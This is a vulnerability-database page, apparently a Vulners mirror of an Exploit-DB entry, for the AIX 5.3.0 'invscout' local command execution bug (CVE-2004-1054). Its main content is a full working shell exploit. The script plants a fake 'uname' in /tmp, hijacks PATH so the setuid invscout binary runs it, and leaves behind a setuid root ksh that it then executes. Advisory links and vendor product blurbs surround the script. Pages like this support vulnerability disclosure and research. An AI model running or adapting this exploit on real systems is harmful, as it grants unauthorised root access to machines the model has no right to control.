Lucene search
+L

AIX 5.3.0 - 'invscout' Local Command Execution

🗓️ 25 Mar 2005 00:00:00Reported by ri0tType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

AIX 5.3.0 'invscout' local command execution exploit allows root access through a simple script.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2004-1054
22 Dec 200405:00
cve
cvelist
Cvelist
CVE-2004-1054
22 Dec 200405:00
cvelist
exploitdb
Exploit DB
AIX 4.3/5.1 < 5.3 - 'lsmcode' Execution Privilege Escalation
21 Dec 200400:00
exploitdb
euvd
EUVD
EUVD-2004-1052
7 Oct 202500:30
euvd
nvd
NVD
CVE-2004-1054
10 Jan 200505:00
nvd
packetstorm
Packet Storm
getr00t.sh
25 Mar 200500:00
packetstorm
securityvulns
securityvulns
[Full-Disclosure] iDEFENSE Security Advisory 12.20.04: IBM AIX invscout Local Command Execution Vulnerability
22 Dec 200400:00
securityvulns
#!/usr/bin/sh
# r00t exploit written for the invscout bug reported by Idefense labs
# http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities
# coded by ri0t exploitation is trivial but automated with this script
# www.ri0tnet.net
#
# usage ./getr00t.sh :)
# exploitation gives euid(root) from here getting guid (root) is as simple as an
# /etc/passwd edit


cd /tmp
echo '/usr/bin/cp /usr/bin/ksh ./' > uname
echo '/usr/bin/chown root:system ./ksh' >> uname
echo '/usr/bin/chmod 777 ./ksh' >> uname
echo '/usr/bin/chmod +s ./ksh' >> uname
/usr/bin/chmod 777 uname
PATH=./
export PATH
/usr/sbin/invscout
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH
exec /tmp/ksh

# milw0rm.com [2005-03-25]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Mar 2005 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.2
EPSS0.00952
35